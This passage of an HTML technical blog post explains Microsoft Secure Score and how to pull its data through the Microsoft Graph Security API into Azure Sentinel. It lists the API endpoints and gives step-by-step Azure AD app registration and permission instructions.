insurance applications.</LI> <LI>Integrate Secure Score data to drive a hybrid or multi-cloud framework for security analytics.</LI> </UL> <P>&nbsp;</P> <P><STRONG>Microsoft Secure Score</STRONG></P> <P>&nbsp;</P> <P>Microsoft Secure Score helps organizations:</P> <UL> <LI>Report on the current state of the organization's security posture.</LI> <LI>Improve their security posture by providing discoverability, 
visibility, guidance, and control.</LI> <LI>Compare with benchmarks and establish key performance indicators (KPIs).</LI> </UL> <P>To help you find the information you need more quickly, Microsoft improvement actions are organized into groups:</P> <UL> <LI>Identity (Azure Active Directory accounts, roles, Microsoft Defender for Identity)</LI> <LI>Device (Microsoft Defender for Endpoint)</LI> <LI>Apps (email and cloud apps, including Office 365 &amp; Microsoft Cloud App Security)</LI> </UL> <P><SPAN>In the <A href="#" target="_self">Microsoft Secure Score overview</A> page (under the Microsoft 365 Security Portal), view how points are split between these groups and what points are available. You can also get an all-up view of the total score, historical trend of your secure score with benchmark comparisons, and prioritized improvement actions that can be taken to improve your score:</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="securescore1.PNG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/280998i4F2734B6FE26317A/image-size/large?v=v2&amp;px=999" role="button" title="securescore1.PNG" alt="securescore1.PNG" /></span></P> <P>&nbsp;</P> <P>You're given points for the following actions:</P> <UL> <LI>Configuring recommended security features</LI> <LI>Doing security-related tasks</LI> <LI>Addressing the improvement action with a third-party application or software, or an alternate mitigation</LI> </UL> <P>The following are scores you can add to your view of your overall score to give you a fuller picture of your overall score:</P> <UL> <LI><STRONG>Planned score</STRONG>: Show projected score when planned actions are completed</LI> <LI><STRONG>Current license score</STRONG>: Show score that can be achieved with your current Microsoft license</LI> <LI><STRONG>Achievable score</STRONG>: Show score that can be achieved with your Microsoft licenses and current 
risk acceptance</LI> </UL> <P><SPAN>Your score is updated in real time to reflect the information presented in the visualizations and improvement action pages. Secure Score also syncs daily to receive system data about your achieved points for each action.</SPAN></P> <P>&nbsp;</P> <P>For more details, please visit <A href="#" target="_self">Assess your security posture with Microsoft Secure Score</A> &amp; <A href="#" target="_self">Microsoft Secure Score</A></P> <P>&nbsp;</P> <P><STRONG>Implementing Secure Score data into Azure Sentinel</STRONG></P> <P>&nbsp;</P> <P>The Security API in Microsoft Graph makes it easy to connect with Microsoft Secure Score in the Intelligent Security Graph. It allows you to more readily realize and enrich the value of these solutions.</P> <P>&nbsp;</P> <P><SPAN>Acquiring the <A href="#" target="_self">Secure Score data from the API</A> requires you to set up a few prerequisites:</SPAN></P> <P>&nbsp;</P> <UL> <LI><SPAN>First, you should choose your consumption model. If you plan to have a non-user-interactive application retrieve data from the API, you should opt for the <A href="#" target="_self">Service-To-Service Authentication model</A>. If your application will require an administrator to provide their logon credentials each time you pull data from the API, you should opt for the user OAuth model. Reference information about this model is located <A href="#" target="_blank" rel="noopener noreferrer">here</A>. If you are a CSP application developer partner, you can also find information <A href="#" target="_blank" rel="noopener noreferrer">here</A>.</SPAN></LI> <LI>Second, you will need to <A href="#" target="_self">register</A> your application in Azure Active Directory in order to call the API. 
You need to grant the SecurityEvents.Read.All and SecurityEvents.ReadWrite.All permission scopes.&nbsp;</LI> </UL> <H4 aria-level="3">&nbsp;</H4> <P>Below is the list of Secure Score exposed APIs:</P> <P>&nbsp;</P> <TABLE border="1" width="100%"> <TBODY> <TR> <TD width="33.333333333333336%"><SPAN>List secure scores</SPAN></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="relative-path">List secureScores</A></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="external">https://graph.microsoft.com/v1.0/security/secureScores</A></TD> </TR> <TR> <TD width="33.333333333333336%"><SPAN>Get secure score</SPAN></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="relative-path">Get secureScore</A></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="external">https://graph.microsoft.com/v1.0/security/secureScores/{id}</A></TD> </TR> <TR> <TD width="33.333333333333336%"><SPAN>List secure score control profiles</SPAN><SPAN><BR /></SPAN></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="relative-path">List secureScoreControlProfiles</A></TD> <TD width="33.333333333333336%"><A href="#" target="_blank" rel="noopener" data-linktype="external">https://graph.microsoft.com/v1.0/security/secureScoreControlProfiles</A></TD> </TR> <TR> <TD><SPAN>Get secure score control profile</SPAN></TD> <TD><A href="#" target="_blank" rel="noopener" data-linktype="relative-path">Get secureScoreControlProfile</A></TD> <TD><A href="#" target="_blank" rel="noopener" data-linktype="external">https://graph.microsoft.com/v1.0/security/secureScoreControlProfiles/{id}</A></TD> </TR> <TR> <TD><SPAN>Update secure score control profiles</SPAN><SPAN><BR /></SPAN></TD> <TD><A href="#" target="_blank" rel="noopener" data-linktype="relative-path">Update secureScoreControlProfile</A></TD> <TD><A 
href="#" target="_blank" rel="noopener" data-linktype="external">https://graph.microsoft.com/v1.0/security/secureScoreControlProfiles/{id}</A></TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <H4 id="toc-hId-679041080" aria-level="3"><SPAN data-contrast="none">Step(1): Register an App</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:40,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></H4> <P><SPAN data-contrast="auto">Create and register Azure AD App to&nbsp;</SPAN><SPAN data-contrast="auto">handle&nbsp;the aut</SPAN><SPAN data-contrast="auto">hentication and authorization&nbsp;to collect the Secure Score data from&nbsp;the Graph API and Microsoft Defender for Endpoint API.</SPAN><SPAN data-contrast="auto">&nbsp;Here are the steps -&nbsp;</SPAN><SPAN data-contrast="auto">navigate&nbsp;to&nbsp;the Azure Active Directory blade of your Azure portal and</SPAN><SPAN data-contrast="auto">&nbsp;follow&nbsp;the steps below:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <OL class="lia-list-style-type-lower-alpha"> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Click on&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">App Registrations</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Select&nbsp;‘</SPAN><SPAN data-contrast="auto">New Registration</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN 
data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Give it&nbsp;a name and c</SPAN><SPAN data-contrast="auto">lick Register.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">API Permissions</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto">&nbsp;</SPAN><SPAN data-contrast="auto">b</SPAN><SPAN data-contrast="auto">lade.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">Add a Permission</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto">.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><STRONG>Microsoft Graph</STRONG><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto">.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN 
data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Click </SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">Application</SPAN><SPAN data-contrast="auto"> Permissions</SPAN><SPAN data-contrast="auto">’.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Search for 'SecurityEvents', Check&nbsp;<STRONG>SecurityEvents.Read.All</STRONG></SPAN><SPAN data-contrast="auto">&nbsp; and <STRONG>SecurityEvents.ReadWrite.All</STRONG> and 'Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">Add&nbsp;permissions</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto">.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">grant&nbsp;admin consent</SPAN><SPAN data-contrast="auto">’.</SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN 
data-contrast="auto">Certificates and Secrets</SPAN><SPAN data-contrast="auto">’.</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">New Client&nbsp;Secret</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto"> </SPAN><SPAN data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="%1)" data-font="Calibri" data-listid="18" aria-setsize="-1" data-aria-posinset="7" data-aria-level="1"><SPAN data-contrast="auto">Enter a description, select&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">never</SPAN><SPAN data-contrast="auto">’</SPAN><SPAN data-contrast="auto">. Click&nbsp;</SPAN><SPAN data-contrast="auto">‘</SPAN><SPAN data-contrast="auto">